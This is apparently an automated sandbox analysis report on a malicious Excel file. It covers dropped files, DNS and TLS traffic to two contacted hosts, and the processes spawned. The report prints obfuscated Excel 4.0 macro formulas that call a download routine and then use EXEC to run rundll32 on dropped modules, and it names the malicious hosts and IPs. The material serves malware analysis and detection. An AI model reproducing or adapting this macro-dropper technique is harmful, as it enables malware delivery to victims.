7dcce5b76c8b17472d024758970a406b | 46747509_by_Libranalysis.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | catalog-1908475637.xls | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | DHL AWB.xlsx | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | export of purchase order 7484876.xlsm | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | XM7eDjwHqp.xlsm | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | QTFsui5pLN.xlsm | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | 15j1TCnOiA.xlsm | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | e8eRhf3GM0.xlsm | malicious | 108.167.180.130, 208.91.198.131
7dcce5b76c8b17472d024758970a406b | Purchase Agreement.docx | malicious | 108.167.180.130, 208.91.198.131

A JA3 value fingerprints the TLS Client Hello, i.e. the client stack. Every match here is an Office or RTF document detonated on the same Windows 7 / Office 2010 image, so the value characterises that client as much as any payload and will also match benign documents opened on such a host. Use it as a pivot to related sandbox runs, as this table does, but block on the contacted hosts or the dropped module rather than on the fingerprint.

Dropped Files

No context

                    Created / dropped Files

                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                    Category:dropped
                    Size (bytes):59863
                    Entropy (8bit):7.99556910241083
                    Encrypted:true
                    SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                    MD5:15775D95513782F99CDFB17E65DFCEB1
                    SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                    SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                    SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: binary cabinet data (MSCF header); the only readable string is the member name authroot.stl
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):893
                    Entropy (8bit):7.366016576663508
                    Encrypted:false
                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: binary certificate data; readable strings: Digital Signature Trust Co., DST Root CA X3
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):326
                    Entropy (8bit):3.149293041712096
                    Encrypted:false
                    SSDEEP:6:kKupkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:2phZkPlE99SNxAhUeSKO
                    MD5:ECD3D1AF4E4373E0181DFB0B1FA2CC0F
                    SHA1:D2064794D7D6789E2FCD07E03B8965FFF478BFE5
                    SHA-256:49B62B2249AFE948DF7FECB5CD9C8C16B32D40857BAC6A55B8C9C81CAC9EA7DC
                    SHA-512:AF94F836572D477252D25C8628BAC820540F60853B5E6C33E86B9D6C5879D2D43DBA48CCA32F40451F1D19F1995C35F8519DEC8BEC4A7ADAED323B3D781BAF09
                    Malicious:false
                    Reputation:low
                    Preview: binary cache metadata containing the UTF-16 URL http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab and the tag "80f8835935d71:0"
                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):252
                    Entropy (8bit):2.993334444389092
                    Encrypted:false
                    SSDEEP:3:kkFklGkfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPWlP1:kKhZQE1liBAIdQZV7ulPPN
                    MD5:E2B0359C2946B2A83C00D72E7E7FF482
                    SHA1:590FC172CD2BDB299D90A5751C7AB67B5C8C09A0
                    SHA-256:346AFB6BCF970C31656589832060D8A0514D1F1968B086171886AA0FD179A6D5
                    SHA-512:ABD758F7BEE2B8EF727C3F55B20763DEF69E0EFD299040EDA15C48E79CE7738A142C18B280C4CF7B42D6877063CC808FAEC9822F1FD79257113C97404D2FE0A6
                    Malicious:false
                    Reputation:low
                    Preview: binary cache metadata containing the UTF-16 URL http://apps.identrust.com/roots/dstrootcax3.p7c and the tag "37d-5bf8df8062700"
                    C:\Users\user\AppData\Local\Temp\88EE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):81161
                    Entropy (8bit):7.9023078240565345
                    Encrypted:false
                    SSDEEP:1536:TeKmfTWbSDcn9iZtJOXAQR2KtCbuMB/yDL4W0DeOkIwXEy:TALWbSD8YZo/Uh0D0D3kIkH
                    MD5:BB9502F4155E166F9BA0D791ACA4E23D
                    SHA1:B80D13B175E28961585738A9AB265F738AF40928
                    SHA-256:3FC637F0B7EA304D0A93EEB1630077998107C31C3BD1CC6687B1C46C6CB2C7B3
                    SHA-512:6BBE4D4B3D2E95572DE0C7E87A0A0F15D74051445842E3622E8F8DFD4CD2F9B55387DDE05CA98FC0ADC176977285DF4F84781D0C50AFC55C809E736C8C8AAA40
                    Malicious:false
                    Reputation:low
                    Preview: binary data; readable strings include PK and [Content_Types].xml
                    C:\Users\user\AppData\Local\Temp\CabF2E8.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                    Category:dropped
                    Size (bytes):59863
                    Entropy (8bit):7.99556910241083
                    Encrypted:true
                    SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                    MD5:15775D95513782F99CDFB17E65DFCEB1
                    SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                    SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                    SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: binary cabinet data (MSCF header); the only readable string is the member name authroot.stl
                    C:\Users\user\AppData\Local\Temp\TarF2E9.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):156386
                    Entropy (8bit):6.3086528024913715
                    Encrypted:false
                    SSDEEP:1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
                    MD5:78CABD9F1AFFF17BB91A105CF4702188
                    SHA1:52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
                    SHA-256:C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
                    SHA-512:F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
                    Malicious:false
                    Preview: binary data; readable strings include the timestamp string 210419201239Z, Microsoft Root Certificate Authority and VeriSign Time Stamping CA
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 11:15:45 2021, atime=Thu May 13 11:15:45 2021, length=12288, window=hide
                    Category:dropped
                    Size (bytes):867
                    Entropy (8bit):4.498209057111674
                    Encrypted:false
                    SSDEEP:12:85QEcLgXg/XAlCPCHaXEKB8VXB/KVGAX+WnicvbFbDtZ3YilMMEpxRljKZTdJP9O:85JK/XT0K6VX0PYedDv3q0rNru/
                    MD5:D9031EEBF26356BB3BABEE39A8BF22FF
                    SHA1:4C8AD2C406A62B025AEA637E5FD4193EA7609418
                    SHA-256:D77F8D4FAD6F9B33E53CF8F38EDEB1B6FEECDA4042237AE74629DA40708D5B6A
                    SHA-512:8474DEC17B44FEAEB826464756FB18EFB409C419D7DFC7DB7AC47E5A30B48A6CF0B8008865F24696B1CECDCD4F80B7F52BC97937CC535498F80872F4B7A5B25B
                    Malicious:false
                    Preview: binary shortcut data; readable strings include C:\Users, shell32.dll, Albus, Desktop, \\971342\Users.user\Desktop, the SID S-1-5-21-966771315-3019405637-367336477-1006 and the host name 971342
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-419065597.LNK
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Thu May 13 11:15:45 2021, atime=Thu May 13 11:15:45 2021, length=174080, window=hide
                    Category:dropped
                    Size (bytes):2098
                    Entropy (8bit):4.5585178670148885
                    Encrypted:false
                    SSDEEP:48:8I/XT0ZVXbFA0p7J0Qh2I/XT0ZVXbFA0p7J0Q/:8I/XuVXbS+7J0Qh2I/XuVXbS+7J0Q/
                    MD5:338443857F50DEF0A1269BB8ADDEEA5E
                    SHA1:577E0349B370CE8D74A47359572DEF30915D4550
                    SHA-256:D2F7770F22BD0E689D432841E69CD4B4C9B0663C27BD397B97DA8BA33800F10C
                    SHA-512:16994874C15DD1338FD0E8D3A5D1A45138881328BC21938B434A458F67DE17A1C60BCC31848FCD5249CE908EA23E134286338B55D510F0BF9502A2BDB39CB042
                    Malicious:false
                    Preview: binary shortcut data; readable strings include C:\Users, shell32.dll, Albus, Desktop, DIAGRA~1.XLS, diagram-419065597.xls, \\971342\Users.user\Desktop\diagram-419065597.xls, the SID S-1-5-21-966771315-3019405637-367336477-1006 and the host name 971342
                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):104
                    Entropy (8bit):4.801361621988822
                    Encrypted:false
                    SSDEEP:3:oyBVomMXCU7KSYZFd7KSYmMXCU7KSYv:dj6XCRSC+SKXCRSC
                    MD5:94036EFD5D6B12AB4378E234BAA91B0D
                    SHA1:5FBA99F3043E4F618FE80C93A75CBD8C7D8FEC0A
                    SHA-256:F9CD6390630DAD2881B0094C6007593A6FB1D10305BBE2168B87027F67FDFF29
                    SHA-512:73D726A6E1F2ACF96E7FCCA45DBB9C4A7A114F231EF063312698A2F2BC6A9816153A8C6AFD22E1619FD43EE35600DA461EEFDCB853666354B2E84D138EDA9329
                    Malicious:false
                    Preview: Desktop.LNK=0..[xls]..diagram-419065597.LNK=0..diagram-419065597.LNK=0..[xls]..diagram-419065597.LNK=0..
                    C:\Users\user\Desktop\89EE0000
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Applesoft BASIC program data, first line number 16
                    Category:dropped
                    Size (bytes):205225
                    Entropy (8bit):5.6442453650812325
                    Encrypted:false
                    SSDEEP:3072:3l8iWBSD8YNoDUF078AH7RDHCjnTDPBarvvrAXrul8i4w:rWBTLDUFC81I4w
                    MD5:CE4D8E82BE66238B8E21A1362AF3095A
                    SHA1:1DECF537A1806AA2ECAEDE99F92563C088CA0FBE
                    SHA-256:5F14E0BA523C083C3D09B3515E54643B959FDD9F00ED70F2A72A0964A323930F
                    SHA-512:052164129BCD5EEDDB24A44C1F79571EDD66D8D249F330A2D9111405741A3793EC0B88F025D37AB6CC32C9CBB3AFC0051AC9E89048C9D72D80F0295343CFD266
                    Malicious:false
                    Preview: binary workbook data; readable strings include the user name user and the font names Calibri, Arial and Cambria

                    Static File Info

                    General

                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:22:48 2021, Security: 0
                    Entropy (8bit):3.261681103749055
                    TrID:
                    • Microsoft Excel sheet (30009/1) 78.94%
                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                    File name:diagram-419065597.xls
                    File size:375808
                    MD5:ec968745c407ee67d80d18c25abaa8d2
                    SHA1:922818d6a781b3780541837975c54baa4e7a3349
                    SHA256:431c2a2e6969ba3aa239af68c3150d86837b3e58bc80b2690b91cf39d459ac55
                    SHA512:8b8e26f86ec06bc25718036c5d94c794014f02d5d4e9ce605d25713becf43e97fdcce82636df650c66bebb930f5b32ea00f52f07470708bd7953dcd153f0b574
                    SSDEEP:3072:Q8UMKE+Y6t/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/2zfOTfFG4l+s2/7nU5BLP:vUMIt6Uqa5DPdG9uS9QLA4l+sBqO

                    File Icon

                    Icon Hash:e4eea286a4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "diagram-419065597.xls"

                    Indicators

                    Has Summary Info:True
                    Application Name:Microsoft Excel
                    Encrypted Document:False
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:True
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:True

                    Summary

                    Code Page:1251
                    Author:van-van
                    Last Saved By:vi-vi
                    Create Time:2006-09-16 00:00:00
                    Last Saved Time:2021-05-12 07:22:48
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Document Code Page:1251
                    Thumbnail Scaling Desired:False
                    Contains Dirty Links:False

                    Streams

                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5DocumentSummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.287037498961
                    Base64 Encoded:False
                    Data ASCII: mostly non-printable; readable strings: Doc1, Doc2, Doc3, Doc4, Excel 4.0
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                    General
                    Stream Path:\x5SummaryInformation
                    File Type:data
                    Stream Size:4096
                    Entropy:0.288480529966
                    Base64 Encoded:False
                    Data ASCII: mostly non-printable; readable strings: van-van, vi-vi, Microsoft Excel
                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363297
                    General
                    Stream Path:Book
                    File Type:Applesoft BASIC program data, first line number 8
                    Stream Size:363297
                    Entropy:3.24802119785
                    Base64 Encoded:True
                    Data ASCII: mostly non-printable; readable strings: vi-vi, Doc3, _xlfn.AGGREGATE, _xlfn.F.INV.RT
                    Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                    Macro 4.0 Code

                    =CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)
                    =CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)
                    =RUN(Doc4!AM6)

                    Macro sheet cells (CSV export, empty cells omitted). In each cell the meaningful formula is surrounded by the filler sequence =RAND()=FACT(59)=SUMXMY2(452354,45245) repeated many times; the filler is written once per position below.

                    Cell 1: =RAND()=FACT(59)=SUMXMY2(452354,45245) [repeated] =FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13) =RAND()=FACT(59)=SUMXMY2(452354,45245) [repeated]
                    Cell 2: =RAND()=FACT(59)=SUMXMY2(452354,45245) [repeated] =FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14) =RAND()=FACT(59)=SUMXMY2(452354,45245) [repeated]
                    Cell 3: =RAND()=FACT(59)=SUMXMY2(452354,45245) [repeated] =FORMULA("U"&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&"A",before.3.5.0.she (cell text cut off in the report)
                    Cell 4: =CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21) =CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21) =RUN(Doc4!AM6)
                    Cell 5: =MDETERM(56241452475) =EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&"2 "&Doc3!BC17&Doc3!BD31&"lRegi"&"ster"&"Ser"&"ver") =EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&"2 "&Doc3!BC18&"1"&Doc3!BD31&"lRegi"&"ster"&"Ser"&"ver") =MDETERM(56241452475) [repeated] =RUN(Doc3!AY22)

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                    May 13, 2021 05:16:15.570801020 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:15.739686966 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:15.739849091 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:15.749993086 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:15.918629885 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:15.926552057 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:15.926589012 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:15.926605940 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:15.926745892 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:15.960908890 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:16.141896009 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:16.142082930 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:17.794972897 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:18.007582903 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:18.380754948 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:18.380767107 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:18.380958080 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:18.381586075 CEST  49167        443        192.168.2.22     108.167.180.130
                    May 13, 2021 05:16:18.460218906 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:18.549998045 CEST  443          49167      108.167.180.130  192.168.2.22
                    May 13, 2021 05:16:18.644145012 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:18.644336939 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:18.644867897 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:18.825505972 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:18.835638046 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:18.835669041 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:18.835683107 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:18.835853100 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:18.889534950 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.064502001 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:19.064579964 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.109901905 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.322457075 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:19.525058985 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:19.525242090 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.525374889 CEST  443          49170      208.91.198.131   192.168.2.22
                    May 13, 2021 05:16:19.525437117 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.525897980 CEST  49170        443        192.168.2.22     208.91.198.131
                    May 13, 2021 05:16:19.697937965 CEST  443          49170      208.91.198.131   192.168.2.22

                    UDP Packets

                    Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                    May 13, 2021 05:16:15.496953964 CEST  52197        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:15.554223061 CEST  53           52197      8.8.8.8          192.168.2.22
                    May 13, 2021 05:16:16.503516912 CEST  53099        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:16.553849936 CEST  53           53099      8.8.8.8          192.168.2.22
                    May 13, 2021 05:16:16.561748981 CEST  52838        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:16.610579967 CEST  53           52838      8.8.8.8          192.168.2.22
                    May 13, 2021 05:16:17.147383928 CEST  61200        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:17.205862045 CEST  53           61200      8.8.8.8          192.168.2.22
                    May 13, 2021 05:16:17.211152077 CEST  49548        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:17.268238068 CEST  53           49548      8.8.8.8          192.168.2.22
                    May 13, 2021 05:16:18.395993948 CEST  55627        53         192.168.2.22     8.8.8.8
                    May 13, 2021 05:16:18.455827951 CEST  53           55627      8.8.8.8          192.168.2.22

                    DNS Queries

                    Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
                    May 13, 2021 05:16:15.496953964 CEST  192.168.2.22  8.8.8.8  0x9610    Standard query (0)  stateoftheartacademy.com.br  A (IP address)  IN (0x0001)
                    May 13, 2021 05:16:18.395993948 CEST  192.168.2.22  8.8.8.8  0x246e    Standard query (0)  dsafarm.com                  A (IP address)  IN (0x0001)

                    DNS Answers

                    Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                         CName  Address          Type            Class
                    May 13, 2021 05:16:15.554223061 CEST  8.8.8.8    192.168.2.22  0x9610    No error (0)  stateoftheartacademy.com.br  -      108.167.180.130  A (IP address)  IN (0x0001)
                    May 13, 2021 05:16:18.455827951 CEST  8.8.8.8    192.168.2.22  0x246e    No error (0)  dsafarm.com                  -      208.91.198.131   A (IP address)  IN (0x0001)

                    HTTPS Packets

                    Connection 1
                      Timestamp: May 13, 2021 05:16:15.926605940 CEST
                      Source IP / Port: 108.167.180.130 / 443
                      Dest IP / Port: 192.168.2.22 / 49167
                      Certificate chain:
                        Subject: CN=cpcontacts.stateoftheartacademy.com.br
                          Issuer: CN=R3, O=Let's Encrypt, C=US
                          Not Before: Tue Feb 16 13:37:39 CET 2021
                          Not After: Mon May 17 14:37:39 CEST 2021
                        Subject: CN=R3, O=Let's Encrypt, C=US
                          Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
                          Not Before: Wed Oct 07 21:21:40 CEST 2020
                          Not After: Wed Sep 29 21:21:40 CEST 2021
                      JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
                      JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

                    Connection 2
                      Timestamp: May 13, 2021 05:16:18.835683107 CEST
                      Source IP / Port: 208.91.198.131 / 443
                      Dest IP / Port: 192.168.2.22 / 49170
                      Certificate chain:
                        Subject: CN=autodiscover.premieregroup.co.in
                          Issuer: CN=R3, O=Let's Encrypt, C=US
                          Not Before: Thu Apr 29 13:33:30 CEST 2021
                          Not After: Wed Jul 28 13:33:30 CEST 2021
                        Subject: CN=R3, O=Let's Encrypt, C=US
                          Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co.
                          Not Before: Wed Oct 07 21:21:40 CEST 2020
                          Not After: Wed Sep 29 21:21:40 CEST 2021
                      JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
                      JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

                    Code Manipulations

                    Statistics

                    CPU Usage


                    Memory Usage


                    High Level Behavior Distribution


                    Behavior


                    System Behavior

                    General

                    Start time: 05:15:42
                    Start date: 13/05/2021
                    Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit): false
                    Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase: 0x13f780000
                    File size: 27641504 bytes
                    MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 05:15:49
                    Start date: 13/05/2021
                    Path: C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit): false
                    Commandline: rundll32 ..\ritofm.cvm,DllRegisterServer
                    Imagebase: 0xff290000
                    File size: 45568 bytes
                    MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    General

                    Start time: 05:15:50
                    Start date: 13/05/2021
                    Path: C:\Windows\System32\rundll32.exe
                    Wow64 process (32bit): false
                    Commandline: rundll32 ..\ritofm.cvm1,DllRegisterServer
                    Imagebase: 0xff290000
                    File size: 45568 bytes
                    MD5 hash: DD81D91FF3B0763C392422865C9AC12E
                    Has elevated privileges: true
                    Has administrator privileges: true
                    Programmed in: C, C++ or other language
                    Reputation: high

                    Disassembly

                    Code Analysis
